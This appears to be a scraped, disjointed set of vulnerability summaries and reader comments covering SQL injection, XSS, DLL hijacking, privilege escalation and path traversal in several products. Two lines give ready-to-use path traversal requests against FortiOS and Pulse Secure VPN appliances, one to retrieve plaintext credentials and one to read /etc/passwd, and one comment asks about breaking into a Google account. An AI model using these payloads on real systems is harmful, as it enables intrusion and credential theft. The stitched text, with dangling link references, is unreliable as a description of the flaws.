College Website CMS had an SQL injection in the department id parameter. Discovered by Ayed Alqahtani (lus33r).

This vulnerability involves a rather unconventional vector for XSS - the comment field of an SSH public key. It has since been patched in newer versions of LuCI, which no longer display public key comments verbatim, in order to prevent injection of any markup, including <script> tags.

The critical vulnerability was discovered by RedRays R&D center in SAP NetWeaver AS JAVA in the ME module.

Lenovo Commercial Vantage Tool Local Privilege Escalation:

Would this work for my hacked Google account so I can gain access?

If you are looking for the Samba vulnerability click the link below:

Acer ships most of the laptops it sells with a software suite called Care Center Service installed. In versions up to and including 4.00.3034, one of the suite’s programs is an executable named ListCheck.exe, which runs at logon with the highest privilege available and suffers from phantom DLL hijacking. This can lead to a privilege escalation when an administrator logs in. Blogpost:

Fortinet FortiOS Path Traversal Retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Getting passwd content with Pulse Secure unauthenticated path traversal: https://localhost/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

If you have permission to modify the configuration file, then you already got the machine. How can it be a vulnerability?